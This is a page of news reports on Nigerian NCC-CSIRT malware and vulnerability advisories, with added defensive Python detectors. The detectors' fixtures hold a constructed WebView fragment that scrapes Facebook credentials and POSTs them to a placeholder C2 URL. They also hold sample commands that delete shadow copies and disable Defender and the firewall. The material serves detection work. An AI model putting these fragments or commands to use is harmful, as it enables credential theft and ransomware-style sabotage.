Tag: CSIRT

  • Malware Attack: NCC-CSIRT warns against malware attack on 300,000 android devices


    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has warned against a malware campaign known as “Schoolyard Bully” that steals Facebook account credentials.

    NCC-CSIRT said the malware had infected over 300,000 Android devices, which prompted an advisory reminding users to download applications only from official sites and app stores.

    The Director of Public Affairs, NCC, Dr Reuben Muoka, made this known in a statement on Wednesday in Abuja.

    Muoka said that researchers from the mobile security firm Zimperium found several apps that distribute the “Schoolyard Bully” malware.

    He said Schoolyard Bully disguised itself as reading and educational apps offering a variety of books and topics for its victims to study.

    Muoka said that the malicious apps had been available on Google Play, adding: “They have already been taken down, yet they still spread via third-party Android app shops.

    “The NCC-CSIRT advisory in this regard further recommended that users double-check each application and uncheck boxes that request extra third-party downloads when installing apps from the Google Play Store.

    “And to use anti-malware applications to routinely scan their devices for malware.

    “The primary objective of the malware, which affects all versions of Facebook Apps for Android, is to steal Facebook account information.

    “To also steal email address and password, account ID, username, device name, device RAM (Random Access Memory), and device API (Application Programming Interface).”

    Muoka quoted NCC-CSIRT as saying: “The (Zimperium) research stated that the malware employs JavaScript injection to steal the Facebook login information.

    “The malware loads a legitimate URL (web address) inside a WebView (a WebView maps website elements to Android View objects and their extensions, enabling user interaction) with malicious JavaScript injected.

    “To obtain the user’s contact information (phone number, email address, and password), then send it to the command-and-control server.”

    He said the malware uses native libraries to evade detection and analysis by security software and machine-learning technologies.
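    The JavaScript-injection technique described above leaves a recognisable footprint in an app's decompiled code: a WebView with JavaScript enabled, a JavaScript-to-Java bridge, a legitimate login URL, script injected after the page loads, and form fields read out of the page. The following is an added triage script, not code from the advisory or from Zimperium's report; the indicator patterns, the scoring rule and the sample "decompiled" fragments are this example's own assumptions, constructed to show what an analyst would grep for.

```python
"""Triage decompiled Android sources for the WebView JavaScript-injection pattern."""
import re
from dataclasses import dataclass, field

# Indicator regexes over decompiled Java/Kotlin lines. The API names are real Android
# WebView calls; treating this combination as the tell-tale pattern is this example's
# assumption, not a published signature.
INDICATORS = {
    "js_enabled":  re.compile(r"setJavaScriptEnabled\(\s*true\s*\)"),
    "js_bridge":   re.compile(r"addJavascriptInterface\("),
    "js_inject":   re.compile(r"evaluateJavascript\(|loadUrl\(\s*\"javascript:"),
    "login_url":   re.compile(r"https?://(?:m|www|mbasic)\.facebook\.com/login", re.I),
    "form_scrape": re.compile(r"document\.getElementById\([^)]*(?:email|pass)[^)]*\)\.value", re.I),
    "exfil":       re.compile(r"HttpURLConnection|OkHttpClient|setRequestMethod\(\s*\"POST\""),
}


@dataclass
class Finding:
    path: str
    hits: dict = field(default_factory=dict)  # indicator name -> first matching line number

    @property
    def score(self) -> int:
        return len(self.hits)


def scan_sources(sources: dict) -> list:
    """sources maps file path -> decompiled text. Returns Findings, highest score first."""
    findings = []
    for path, text in sources.items():
        hits = {}
        for lineno, line in enumerate(text.splitlines(), 1):
            for name, pat in INDICATORS.items():
                if name not in hits and pat.search(line):
                    hits[name] = lineno
        if hits:
            findings.append(Finding(path, hits))
    return sorted(findings, key=lambda f: f.score, reverse=True)


def is_suspicious(f: Finding) -> bool:
    """JS enabled plus at least two of: script injection, a login URL, form-field scraping."""
    core = {"js_inject", "login_url", "form_scrape"}
    return "js_enabled" in f.hits and len(core.intersection(f.hits)) >= 2


# Constructed fragments in the shape of decompiled output (not real malware source).
SAMPLE_SOURCES = {
    "com/example/reader/LoginActivity.java": r'''
        WebView wv = findViewById(R.id.web);
        wv.getSettings().setJavaScriptEnabled(true);
        wv.addJavascriptInterface(new Bridge(), "Android");
        wv.loadUrl("https://m.facebook.com/login.php");
        wv.setWebViewClient(new WebViewClient() {
            public void onPageFinished(WebView v, String url) {
                v.evaluateJavascript("(function(){var e=document.getElementById('m_login_email').value;"
                    + "var p=document.getElementById('m_login_password').value;Android.send(e,p);})()", null);
            }
        });
    ''',
    "com/example/reader/Bridge.java": r'''
        @JavascriptInterface public void send(String e, String p) {
            HttpURLConnection c = (HttpURLConnection) new URL(C2_URL).openConnection();
            c.setRequestMethod("POST");
        }
    ''',
    "com/example/reader/BookView.java": r'''
        WebView wv = findViewById(R.id.book);
        wv.getSettings().setJavaScriptEnabled(true);
        wv.loadUrl("https://books.example.org/read?id=" + bookId);
    ''',
}

if __name__ == "__main__":
    for f in scan_sources(SAMPLE_SOURCES):
        label = "SUSPICIOUS" if is_suspicious(f) else "review    "
        print(label, f.path, f.hits)
```

    Run it over the output of a decompiler such as jadx. A reading app that merely enables JavaScript for its own book pages (the third fragment) is reported for review but not flagged, while the login-page injector is flagged on the combination of indicators rather than on any single API call.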

    “The CSIRT is the telecom sector’s cybersecurity incident centre set up by the NCC to focus on incidents in the telecom sector and as they may affect telecom consumers and citizens at large.

    “The CSIRT also works collaboratively with the Nigerian Computer Emergency Response Team (ngCERT), established by the Federal Government to reduce the volume of future computer risk incidents by preparing, protecting, and securing Nigerian cyberspace to forestall attacks, problems or related events.”

  • NCC-CSIRT urges firmware update after Lenovo found vulnerabilities in own products


    Equipment manufacturer Lenovo has disclosed several vulnerabilities in some of its products which, it said, could lead to information disclosure, privilege escalation and denial of service.

    The vulnerabilities primarily affect Lenovo products in the Desktop, Desktop All-in-One, Hyperscale, Lenovo Notebook, Smart Office, Storage, ThinkAgile, ThinkPad, ThinkServer, ThinkStation and ThinkSystem lines.

    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT), in its recent advisory, rated the probability of exploitation as high, with an equally high damage potential. It therefore urged users of affected products to update their firmware.

    The advisory cited the Lenovo report, first published in the second week of this month, which attributes the vulnerabilities to flaws in the System Management Interrupt (SMI) Set BIOS Password handler, in other SMI handlers used to configure platform settings over Windows Management Instrumentation (WMI), and to a buffer overflow in a WMI SMI handler.

    Successful exploitation could allow an authenticated local attacker to bypass security restrictions, gain elevated privileges and execute arbitrary code on the targeted system. An attacker could also send a specially crafted request to the targeted user to obtain sensitive information. The outcomes are unauthorised information disclosure, privilege escalation and denial of service on the targeted system.

    According to NCC-CSIRT, the solution to addressing the vulnerabilities is for users to update their system firmware to the newer version(s) indicated for their product model.


  • NCC-CSIRT proffers countermeasures against website scams on Microsoft Edge Browser


    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has issued an advisory urging users to install trusted, up-to-date antivirus software with an Internet security component and to customise the News Feed in the Microsoft Edge browser.

    This is part of the countermeasures to lessen the chances of falling for a malicious advertising campaign discovered on the browser’s News Feed.

    The NCC-CSIRT further advised users of the browser to practise safe browsing habits and to refrain from clicking on links they are unsure of, in the face of a threat rated as high in probability and in potential damage to systems.

    The advisory stated that the malicious advertising campaign, uncovered on the Microsoft Edge News Feed, redirects victims to fraudulent tech support websites, and that cybercriminals post bizarre, attention-grabbing stories or advertisements on the feed to entice users to click on them. The malicious advertisements appear legitimate but carry malware and/or other threats.

    According to the advisory, “The Microsoft Edge News Feed is the default page that appears when a new tab is opened, and it displays information such as news, advertisements, weather, and traffic updates. Also, the following are the steps that result in being redirected to a bogus tech support page: the user clicks on a story or advertisement, and the Edge browser settings are analysed for various metrics.”

    Based on those metrics and prior results, the advisory said, “if the user is adjudged to be a bot or in a location that is not of interest, the user is redirected to a harmless dummy page that is relevant to the story or advertisement initially clicked on; however, if the user is adjudged a potential victim, then the user is redirected to a tech support scam website for further exploitation.”
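    The cloaking described above (a dummy page for clients judged to be bots, the scam page for likely victims) is what makes such campaigns hard to reproduce from a scanner. The following is an added example, not code from the advisory: it traces the redirect chain behind one link under two client profiles, without letting the HTTP library follow redirects on its own, and reports cloaking when the final hosts differ. The hostnames, the profiles and the recorded gate behaviour are constructed so that it runs offline; `live_fetch` is the drop-in for a real trace.

```python
"""Detect cloaked redirects by tracing the same link under two client profiles."""
import urllib.request
from urllib.error import HTTPError
from urllib.parse import urljoin, urlsplit

MAX_HOPS = 10


def trace_chain(start, headers, fetch):
    """Follow 3xx Location hops by hand and return the list of URLs visited (start first).

    fetch(url, headers) -> (status, response_headers) and must NOT follow redirects itself.
    """
    chain = [start]
    url = start
    for _ in range(MAX_HOPS):
        status, resp_headers = fetch(url, headers)
        if not 300 <= status < 400:
            break
        location = {k.lower(): v for k, v in resp_headers.items()}.get("location")
        if not location:
            break
        url = urljoin(url, location)   # Location may be relative
        if url in chain:               # redirect loop
            break
        chain.append(url)
    return chain


def cloaking_report(start, profiles, fetch):
    """Trace `start` once per profile; cloaked if the profiles land on different hosts."""
    chains = {name: trace_chain(start, hdrs, fetch) for name, hdrs in profiles.items()}
    finals = {name: urlsplit(c[-1]).hostname for name, c in chains.items()}
    return {"chains": chains, "final_hosts": finals, "cloaked": len(set(finals.values())) > 1}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # hand the 3xx back to the caller instead of following it


def live_fetch(url, headers):
    """Online fetch: one GET with redirects disabled, returning (status, headers)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, headers=headers), timeout=10) as resp:
            return resp.status, dict(resp.headers)
    except HTTPError as e:  # 3xx arrive here once redirects are not followed
        return e.code, dict(e.headers)


# Two client profiles (constructed User-Agent strings): a crawler-like one and a browser-like one.
PROFILES = {
    "bot":    {"User-Agent": "Mozilla/5.0 (compatible; HeadlessChrome/108.0) crawler"},
    "victim": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edg/108.0",
               "Accept-Language": "en-NG"},
}


def recorded_fetch(url, headers):
    """Constructed recording of a cloaking gate; stands in for live_fetch so the example runs offline."""
    ua = headers.get("User-Agent", "")
    looks_like_bot = "Headless" in ua or "crawler" in ua.lower()
    if url == "https://feed-click.example/click?id=7":
        return 302, {"Location": "https://gate.example/check?id=7"}
    if url == "https://gate.example/check?id=7":
        if looks_like_bot:
            return 302, {"Location": "/story/7"}  # relative redirect to a harmless dummy page
        return 302, {"Location": "https://support-alert.example/?case=7"}
    return 200, {"Content-Type": "text/html"}


if __name__ == "__main__":
    report = cloaking_report("https://feed-click.example/click?id=7", PROFILES, recorded_fetch)
    for name, chain in report["chains"].items():
        print(name, " -> ".join(chain))
    print("cloaked:", report["cloaked"])
```

    Real gates also key on source IP geolocation, which no header can imitate, so a trace from one vantage point that shows no divergence does not prove the link is clean; a divergence, however, is conclusive.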

    Victims of the tech support scam could have their Personally Identifiable Information (PII) and other data harvested, or could be infected with malware.

    The NCC therefore urges telecom consumers and other stakeholders in the ecosystem to install up-to-date antivirus software and to be alert to the wiles of cybercriminals so as not to fall victim to cyber scams.


  • NCC-CSIRT alerts on Google Chrome extensions malware


    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has identified five malicious Google Chrome extensions that surreptitiously track users’ browsing activity and steal their data.

    According to NCC-CSIRT, the five malicious extensions, earlier discovered by the McAfee Mobile Research Team, are Netflix Party (800,000 downloads), Netflix Party 2 (300,000), Full Page Screenshot Capture Screenshotting (200,000), FlipShope Price Tracker Extension (80,000) and AutoBuy Flash Sales (20,000).

    The NCC-CSIRT rated the five Chrome extensions as high in probability and damage potential, noting that they had been downloaded more than 1.4 million times and served as a channel for stealing users’ data. The telecom-sector cybersecurity team urged telecom consumers to be cautious when installing any browser extension.

    “The users of these chrome extensions are unaware of their invasive functionality and privacy risk. Malicious extensions monitor victims’ visits to e-commerce websites and modify the visitor’s cookie to appear as if they came through a referrer link. Consequently, the extensions’ developers get an affiliate fee for any purchases at electronic shops,” the advisory said.

    In addition, the advisory stated that although Google has removed several browser extensions from its Chrome Web Store, keeping malicious extensions out may be difficult. The NCC-CSIRT thus recommended that telecom consumers exercise caution when installing any browser extension.

    “These include removing all listed extensions from their Chrome browser manually. Internet users are to pay close attention to the prompts from their browser extensions, such as the permission to run on any website visited and the data requested, before installing them. Although some extensions seem legitimate because of the high number of user downloads, these hazardous add-ons make it imperative for users to ascertain the authenticity of extensions they access,” the advisory stated.

    Google Chrome extensions are software programs that can be installed into Chrome to change the browser’s functionality, whether by adding new features or by modifying the browser’s existing behaviour to make it more convenient for the user. They serve purposes such as blocking ads, integrating with password managers and finding coupons for items added to a shopping cart.
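    The cookie tampering described in the advisory needs two things an extension must declare in its manifest: access to every site (or at least to the shops it targets) and the `cookies` API. The following is an added triage script, not part of the NCC-CSIRT or McAfee material: it reads the `manifest.json` files Chrome keeps under a profile's `Extensions` folder and ranks each extension by that combination, also matching the five names given above (the page gives names only, not store IDs, so the match is by name). The sample manifests are constructed, and the permission sets treated as risky are this example's own judgement.

```python
"""Triage Chrome extension manifests for the capabilities behind affiliate-cookie abuse."""
import json
import re
from pathlib import Path

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
RISKY_APIS = {"cookies", "webRequest", "webRequestBlocking", "declarativeNetRequest",
              "scripting", "tabs", "webNavigation", "history"}
# The five extensions named in the advisory, normalised to lower-case words.
NAMED_IN_ADVISORY = {"netflix party", "netflix party 2", "full page screenshot capture screenshotting",
                     "flipshope price tracker extension", "autobuy flash sales"}


def _norm(name):
    return " ".join(re.findall(r"[a-z0-9]+", name.lower()))


def _is_host_pattern(p):
    return p == "<all_urls>" or "://" in p


def triage_manifest(m):
    """Return {"name", "version", "manifest_version", "risk", "reasons"} for one manifest dict."""
    declared = m.get("permissions", []) + m.get("optional_permissions", [])
    apis = {p for p in declared if not _is_host_pattern(p)}
    # Manifest v2 mixes host patterns into "permissions"; v3 moves them to "host_permissions".
    hosts = {p for p in declared if _is_host_pattern(p)} | set(m.get("host_permissions", []))
    for cs in m.get("content_scripts", []):
        hosts.update(cs.get("matches", []))

    reasons = []
    broad = bool(hosts & BROAD_HOSTS)
    if broad:
        reasons.append("host access to every site: " + ", ".join(sorted(hosts & BROAD_HOSTS)))
    if "cookies" in apis:
        reasons.append("cookies API" + (": can rewrite affiliate/referrer cookies on every site" if broad else ""))
    other = sorted((apis & RISKY_APIS) - {"cookies"})
    if other:
        reasons.append("other privileged APIs: " + ", ".join(other))
    # Names may be localised placeholders like "__MSG_appName__"; those simply will not match.
    named = _norm(m.get("name", "")) in NAMED_IN_ADVISORY
    if named:
        reasons.append("name matches an extension listed in the advisory")

    if named or (broad and "cookies" in apis):
        risk = "high"
    elif broad or other:
        risk = "medium"
    else:
        risk = "low"
    return {"name": m.get("name"), "version": m.get("version"),
            "manifest_version": m.get("manifest_version"), "risk": risk, "reasons": reasons}


def triage_profile(profile_dir):
    """Chrome stores installed extensions as <profile>/Extensions/<id>/<version>/manifest.json."""
    order = {"high": 0, "medium": 1, "low": 2}
    results = []
    for mf in Path(profile_dir, "Extensions").glob("*/*/manifest.json"):
        r = triage_manifest(json.loads(mf.read_text(encoding="utf-8")))
        r["id"] = mf.parts[-3]
        results.append(r)
    return sorted(results, key=lambda r: order[r["risk"]])


# Constructed manifests (not the real extensions' manifests).
SUSPECT_MV2 = {
    "manifest_version": 2, "name": "Flash Sale Helper", "version": "1.3",
    "permissions": ["cookies", "tabs", "webRequest", "webRequestBlocking", "<all_urls>"],
    "background": {"scripts": ["bg.js"]},
    "content_scripts": [{"matches": ["*://*.example-shop.com/*"], "js": ["cs.js"]}],
}
SUSPECT_MV3 = {
    "manifest_version": 3, "name": "Netflix Party", "version": "2.0.1",
    "permissions": ["cookies", "storage"], "host_permissions": ["<all_urls>"],
}
MEDIUM_MV3 = {
    "manifest_version": 3, "name": "Price Peek", "version": "1.0",
    "permissions": ["tabs"], "host_permissions": ["https://*/*"],
}
BENIGN_MV3 = {
    "manifest_version": 3, "name": "Tab Notes", "version": "0.9",
    "permissions": ["storage", "activeTab"],
}

if __name__ == "__main__":
    for m in (SUSPECT_MV2, SUSPECT_MV3, MEDIUM_MV3, BENIGN_MV3):
        r = triage_manifest(m)
        print(f'{r["risk"]:6} {r["name"]}: {"; ".join(r["reasons"]) or "nothing notable"}')
```

    Point `triage_profile` at a user's profile directory (on Windows typically `%LOCALAPPDATA%\Google\Chrome\User Data\Default`) to get the installed set ranked; the `id` field is the Web Store ID, which is what to search for when confirming a removal.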


  • Yanluowang Ransomware: NCC-CSIRT urges stronger security measures


    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has urged organisations to adopt stronger cybersecurity measures.

    These measures include ensuring that employees use strong, unique passwords for every account and enable multi-factor authentication wherever it is supported, as well as keeping regular system backups, to prevent ransomware attacks.

    The NCC-CSIRT’s warning, contained in its advisory of August 12, 2022, came after the Yanluowang threat actors gained access to Cisco’s network using an employee’s stolen credentials, having hijacked the employee’s personal Google account, which contained credentials synced from their browser.

    Ransomware is malware designed to deny a user or organisation access to the files on their computer until they pay the attackers.

    Cisco reported the security incident on its corporate network but said it did not identify any impact on its business, although the threat actors had published a list of files from the incident on the dark web on August 10.

    NCC-CSIRT rated the potential damage from the incident as critical, warning that successful exploitation could result in ransomware deployment on compromised systems, the theft and exposure of sensitive product and customer data, and heavy financial loss to organisations through significant indirect costs, as well as reputational damage.

    The team said, “The first step to preventing ransomware attacks is to ensure that employees are using strong, unique passwords for every account and enabling multi-factor authentication (2FA) wherever it’s supported.”

    It further disclosed that “In response to the attack, Cisco has immediately implemented a company-wide password reset. Users of Cisco products should ensure a successful password reset.

    “As a precaution, the company has also created two Clam AntiVirus signatures (Win.Exploit.Kolobko-9950675-0 and Win.Backdoor.Kolobko-9950676-0) to disinfect any potentially compromised assets. Clam AntiVirus Signatures (or ClamAV) is a multi-platform antimalware toolkit that can detect a wide range of malware and viruses.

    “User education is critical in thwarting this type of attack or any similar attack, including ensuring that employees are aware of the legitimate channels through which support personnel will contact users, so that employees can identify fraudulent attempts to obtain sensitive information. Organisations should ensure regular systems backup,” the advisory urged.


  • NCC-CSIRT flags ‘HiddenAds’ malware that jeopardizes users’ privacy


    The Nigerian Communications Commission’s Computer Security Incident Response Team (NCC-CSIRT) has flagged a new malware family, HiddenAds, which has infiltrated the Google Play Store and can impact device performance and jeopardise users’ privacy.

    In its advisory of August 8, 2022, NCC-CSIRT classified the malware, first identified by the McAfee Mobile Research Team, as high in probability and damage potential.

    The malware infiltrated the Google Play Store in the form of several device cleaners or optimization apps.

    According to the summary provided by NCC-CSIRT: “Upon installation, it can run malicious services without the user opening the app. It also spams the user with irrelevant advertisements. The apps have received downloads ranging from 100,000 to over a million.

    “Some of the apps HiddenAds masquerades as are: Junk Cleaner, EasyCleaner, Power Doctor, Carpet Clean, Super Clean, Meteor Clean, Strong Clean, Windy Clean, Fingertip Cleaner, Keep Clean, Full Clean – Clean Cache, Quick Cleaner, and Cool Clean.

    “When a user installs any of the aforementioned apps, whether the user has opened the app or not, a malicious service is immediately installed on the device. The app will then attempt to blend into the app tray by changing its icon to the Google Play icon that every Android user is familiar with. Its name will also change to ‘Google Play’ or ‘Setting’. The device will then be bombarded with ads in a variety of deceptive ways, severely impairing the user experience,” the advisory stated.

    Anyone who installs one of these apps will see device performance suffer significantly; clicking on the ads may result in stealthy downloads or installation of other malware; users may inadvertently subscribe to services and be billed monthly; and their privacy will be jeopardised.

    NCC-CSIRT advised users to avoid downloading questionable apps or apps they are unsure about while those who have installed any of the identified malicious apps should immediately delete them.

    It further disclosed that where the malicious app’s icon and name have changed, it can be identified by the fact that it can be uninstalled, whereas the legitimate Google Play app cannot.

    The advisory recommended the installation of anti-virus/anti-malware software with a proven track record for detecting and removing malware.



  • Why you should set up automatic update for your antivirus – NCC


    The Nigerian Communications Commission (NCC) has advised telecom consumers and other Information and Communications Technology (ICT) end users to always enable the automatic update feature of Avast and AVG antivirus products, to close off exposure to known vulnerabilities.

    This was contained in a new advisory released by the Computer Security Incident Response Team (CSIRT), the cybersecurity centre for the telecom sector established by the Commission, in continuation of its resolve to keep Nigerians safe in cyberspace.

    The advisory noted that the vulnerabilities in Avast and AVG antivirus can expose millions of devices to attack, with high impact for the ICT user. The threat types arising from the vulnerabilities are authentication bypass, remote code execution and unauthorised access, while the consequences range from privilege escalation and bypassing security products to overwriting system components and corrupting the operating system.

    According to CSIRT, researchers at the security firm SentinelOne discovered two potentially damaging vulnerabilities in Avast and AVG antivirus products that allow attackers to escalate privileges, enabling them to disable security products, overwrite system components, corrupt the operating system or perform malicious operations unimpeded.

    “Two vulnerabilities identified as CVE-2022-26522 and CVE-2022-26523 targeted the “Anti Rootkit” driver of Avast antivirus (also used by AVG) allowing an attacker with limited privileges on the targeted system to execute code in system mode (kernel mode) and take complete control of the device. Moreover, the vulnerabilities allow complete take-over of a device, even without privileges, due to the ability to execute code in kernel mode,” the CSIRT said in the advisory.

    The cybersecurity centre has offered three measures that Internet/ICT users should take to avoid being exposed to the threat: enabling the automatic update feature for Avast and AVG antivirus, upgrading Avast and AVG antivirus to version 22.1.2504 or later, and carrying out regular patch management.
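    Both this advisory and the Lenovo firmware advisory above reduce to the same check: is the installed version at or above the version the vendor fixed? The following is an added example, not code from either advisory. It compares an Avast/AVG product version against the 22.1.2504 floor stated above, and parses `dmidecode -t bios -t system` output so that the Lenovo advice ("update to the firmware version indicated for your model") can be run as a fleet check against a per-model minimum. The `dmidecode` output, the model name and the BIOS minimum are constructed placeholders; the assumption that a BIOS version string contains one dotted numeric run is this example's, so take the real minimums and formats from the vendor bulletin.

```python
"""Minimum-version gate for antivirus and BIOS firmware versions."""
import re
import subprocess

MIN_AVAST = "22.1.2504"  # version named in the advisory

# Constructed placeholder mapping: product name -> minimum BIOS version. Fill from the vendor bulletin.
BIOS_MINIMUMS = {
    "EXAMPLE NOTEBOOK 14": "1.50",
}


def parse_version(s):
    """Leading dotted numeric run: '22.1.2504' -> (22, 1, 2504); 'ABCD12W (1.50 )' -> (1, 50)."""
    m = re.search(r"\d+(?:\.\d+)+", s)
    if not m:
        raise ValueError(f"no dotted version in {s!r}")
    return tuple(int(x) for x in m.group(0).split("."))


def is_at_least(installed, minimum):
    """Numeric, component-wise comparison; shorter tuples are zero-padded ('22.1' == '22.1.0')."""
    a, b = parse_version(installed), parse_version(minimum)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) >= b + (0,) * (n - len(b))


def avast_is_patched(installed):
    return is_at_least(installed, MIN_AVAST)


def parse_dmidecode(text):
    """Collect 'Key: value' fields under each '... Information' block of dmidecode output."""
    blocks, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if raw and not raw[0].isspace() and line.endswith("Information"):
            current = line
            blocks[current] = {}
        elif current and ":" in line:
            k, v = line.split(":", 1)
            blocks[current][k.strip()] = v.strip()
    return blocks


def bios_status(dmidecode_text, minimums=BIOS_MINIMUMS):
    """Compare the machine's BIOS version with the minimum recorded for its product name."""
    info = parse_dmidecode(dmidecode_text)
    product = info.get("System Information", {}).get("Product Name", "").upper()
    version = info.get("BIOS Information", {}).get("Version", "")
    minimum = minimums.get(product)
    if minimum is None:
        return {"product": product, "bios": version, "status": "unknown-model"}
    ok = is_at_least(version, minimum)
    return {"product": product, "bios": version, "minimum": minimum,
            "status": "patched" if ok else "UPDATE-REQUIRED"}


def local_bios_status():
    """Run dmidecode on this Linux host (needs root). Not used by the offline sample below."""
    out = subprocess.run(["dmidecode", "-t", "bios", "-t", "system"],
                         capture_output=True, text=True, check=True).stdout
    return bios_status(out)


# Constructed sample in the shape of `dmidecode -t bios -t system` output.
SAMPLE_DMIDECODE = """\
# dmidecode 3.3
Handle 0x0000, DMI type 0, 26 bytes
BIOS Information
\tVendor: EXAMPLE
\tVersion: ABCD12W (1.45 )
\tRelease Date: 01/10/2022

Handle 0x0001, DMI type 1, 27 bytes
System Information
\tManufacturer: EXAMPLE
\tProduct Name: Example Notebook 14
\tSerial Number: 0000000000
"""

if __name__ == "__main__":
    for v in ("21.11.2500", "22.1.2504", "22.2.6003"):
        print(f"Avast/AVG {v}: {'patched' if avast_is_patched(v) else 'UPDATE-REQUIRED'}")
    print(bios_status(SAMPLE_DMIDECODE))
```

    On Windows the BIOS version is available from `Get-CimInstance Win32_BIOS` and the product name from `Win32_ComputerSystem`; feed those strings to `is_at_least` in the same way. A version string that does not parse should be treated as a failed check, not silently skipped.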

  • NCC uncovers cyber threats to Windows platforms, routers


    The Computer Security Incident Response Team (CSIRT) set up by the Nigerian Communications Commission (NCC) for the telecoms sector has discovered two new and separate cyber threats, targeting Windows platforms and a particular make of router respectively.

    The discoveries were made known in two separate advisories released by the cyber-space protection team earlier this week.

    The first is a ransomware known as ‘LokiLocker’, which is capable of wiping data from all versions of Windows. It causes data loss and denial of service (DoS), which reduces users’ productivity.

    LokiLocker is a relatively new ransomware family discovered by security researchers. It operates by encrypting user files and renders the compromised system useless if the victim does not pay the demanded ransom in time.

    To hide its activity, the ransomware displays a fake Windows Update screen, kills specific processes and services, and disables Task Manager, Windows Error Reporting, the Windows Firewall and Windows Defender on the compromised system.

    It also hampers data recovery by deleting backup files and shadow copies and removing system restore points, and it overwrites the user’s login note and modifies the original equipment manufacturer (OEM) information in the registry of the compromised system.
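    Each of the tampering steps just described is performed through ordinary Windows tooling, and each shows up in process-creation telemetry before any file is encrypted. The following is an added detection example, not code from the advisory: it runs behaviour rules over process-creation events and flags a host that trips several distinct behaviours within a short window. The page does not state which exact commands LokiLocker runs, so the command-line patterns are this example's assumptions about the usual ways of deleting shadow copies, disabling recovery, Task Manager, Windows Error Reporting, the firewall and Defender; the log events are constructed in a Sysmon Event ID 1 style.

```python
"""Flag the pre-encryption tampering sequence in process-creation logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (behaviour named in the advisory, regex over the process command line). Assumed patterns.
RULES = [
    ("delete shadow copies",
     r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete|Win32_ShadowCopy.*Delete"),
    ("delete backup catalog",
     r"wbadmin(?:\.exe)?\s+delete\s+(?:catalog|systemstatebackup)"),
    ("disable recovery / restore points",
     r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"
     r"|SystemRestore\\.*Disable(?:SR|Config)|Disable-ComputerRestore"),
    ("disable Task Manager",
     r"Policies\\System\b.*DisableTaskMgr"),
    ("disable Windows Error Reporting",
     r"sc(?:\.exe)?\s+(?:stop|config)\s+WerSvc|Windows Error Reporting\\.*\bDisabled\b"),
    ("disable firewall",
     r"netsh(?:\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off|Set-NetFirewallProfile.*-Enabled\s+False"),
    ("disable Defender",
     r"Set-MpPreference\s+-Disable\w+\s+\$?true|Windows Defender\\.*Disable(?:AntiSpyware|RealtimeMonitoring)"),
]
COMPILED = [(name, re.compile(pat, re.I)) for name, pat in RULES]
WINDOW = timedelta(minutes=10)   # distinct behaviours must fall within this span
MIN_DISTINCT = 3                 # one vssadmin run by an admin is not an alert; three behaviours are


def classify(cmdline):
    """Behaviour names whose rule matches this command line."""
    return [name for name, pat in COMPILED if pat.search(cmdline)]


def detect(events):
    """events: dicts with 'ts' (ISO 8601), 'host', 'image', 'cmd'. Returns a per-host summary."""
    per_host = defaultdict(list)
    for e in events:
        for behaviour in classify(e["cmd"]):
            per_host[e["host"]].append((datetime.fromisoformat(e["ts"]), behaviour, e["image"], e["cmd"]))
    report = {}
    for host, hits in per_host.items():
        hits.sort()
        span = hits[-1][0] - hits[0][0]
        behaviours = sorted({b for _, b, _, _ in hits})
        report[host] = {
            "behaviours": behaviours,
            "span": span,
            "ransomware_pattern": len(behaviours) >= MIN_DISTINCT and span <= WINDOW,
            "evidence": [c for _, _, _, c in hits],
        }
    return report


# Constructed process-creation events (Sysmon Event ID 1 style), not a real incident log.
SAMPLE_EVENTS = [
    {"ts": "2022-03-15T10:01:02", "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2022-03-15T10:01:03", "host": "WS01", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmd": "wmic shadowcopy delete"},
    {"ts": "2022-03-15T10:01:05", "host": "WS01", "image": r"C:\Windows\System32\bcdedit.exe",
     "cmd": "bcdedit /set {default} recoveryenabled no"},
    {"ts": "2022-03-15T10:01:06", "host": "WS01", "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"},
    {"ts": "2022-03-15T10:01:07", "host": "WS01", "image": r"C:\Windows\System32\sc.exe",
     "cmd": "sc stop WerSvc"},
    {"ts": "2022-03-15T10:01:08", "host": "WS01", "image": r"C:\Windows\System32\netsh.exe",
     "cmd": "netsh advfirewall set allprofiles state off"},
    {"ts": "2022-03-15T10:01:09", "host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -nop -w hidden -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2022-03-15T10:02:00", "host": "WS02", "image": r"C:\Windows\System32\svchost.exe",
     "cmd": "svchost.exe -k netsvcs -p"},
    {"ts": "2022-03-15T09:00:00", "host": "WS03", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin delete shadows /for=D: /oldest"},   # a lone clean-up: logged, not alerted
]

if __name__ == "__main__":
    for host, r in detect(SAMPLE_EVENTS).items():
        flag = "ALERT" if r["ransomware_pattern"] else "info "
        print(f"{flag} {host} {len(r['behaviours'])} behaviours in {r['span']}: {r['behaviours']}")
```

    The same rules serve as a blocking policy if the EDR or AppLocker layer can act on command lines, but the detection should be kept even then: the offline backup the advisory calls for is what actually restores service, and an alert on the first `vssadmin delete shadows` is the earliest signal that it is about to be needed.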

    The NCC-CSIRT advisory states: “To protect against infections by LokiLocker and similar ransomware, the best rule is to always have a backup copy of your data, which should be stored offline.”

